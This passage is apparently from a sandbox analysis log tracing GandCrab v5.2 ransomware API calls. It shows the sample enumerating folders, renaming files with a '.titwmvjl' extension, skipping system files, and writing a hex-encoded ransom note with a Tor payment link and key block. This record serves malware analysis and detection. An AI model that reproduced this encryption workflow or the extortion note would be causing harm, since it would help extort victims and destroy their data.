x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.967] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.968] CloseHandle (hObject=0x230) returned 1 [0096.968] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.968] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.968] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x11d)) [0096.968] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.968] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.968] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.969] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock") returned 56 [0096.969] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\accountpictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.970] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.970] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.971] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\") returned 32 [0096.971] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0096.971] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5034f8 [0096.971] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.971] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.972] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.972] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.972] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.972] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.972] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.972] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock" [0096.972] lstrlenW (lpString=".titwmvjl") returned 9 [0096.972] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock") returned 56 [0096.972] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.972] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 65 [0096.972] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\d2ca4a09d2ca4deb61a.lock") returned 56 [0096.972] lstrlenW (lpString=".lock") returned 5 [0096.972] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.972] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.972] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.972] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.973] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.973] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.973] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.973] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned="C:\\Users\\Public\\AccountPictures\\desktop.ini" [0096.973] lstrlenW (lpString=".titwmvjl") returned 9 [0096.973] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0096.973] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.973] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\AccountPictures\\desktop.ini.titwmvjl") returned 52 [0096.973] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0096.973] lstrlenW (lpString=".ini") returned 4 [0096.973] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.973] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.973] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.973] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.973] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0096.974] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0096.974] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.974] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.974] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.974] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.974] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.974] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt" [0096.974] lstrlenW (lpString=".titwmvjl") returned 9 [0096.974] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt") returned 52 [0096.974] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.974] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 61 [0096.974] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt") returned 52 [0096.974] lstrlenW (lpString=".txt") returned 4 [0096.974] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.974] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.974] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.974] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.975] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt") returned 52 [0096.975] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\TITWMVJL-DECRYPT.txt") returned 52 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.975] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.975] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.975] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.975] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0096.976] CloseHandle (hObject=0x230) returned 1 [0096.976] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.976] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.976] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.976] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock" [0096.976] lstrlenW (lpString=".titwmvjl") returned 9 [0096.976] lstrlenW (lpString="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock") returned 40 [0096.976] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.976] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 49 [0096.976] lstrlenW (lpString="C:\\Users\\Public\\d2ca4a09d2ca4deb61a.lock") returned 40 [0096.976] lstrlenW (lpString=".lock") returned 5 [0096.976] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.976] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.976] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.976] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.977] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.977] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0096.977] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0096.977] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0096.977] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0096.977] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.977] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.977] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.978] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.978] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.978] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.978] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Desktop\\\\TITWMVJL-DECRYPT.txt") returned 45 [0096.978] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\desktop\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.979] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x6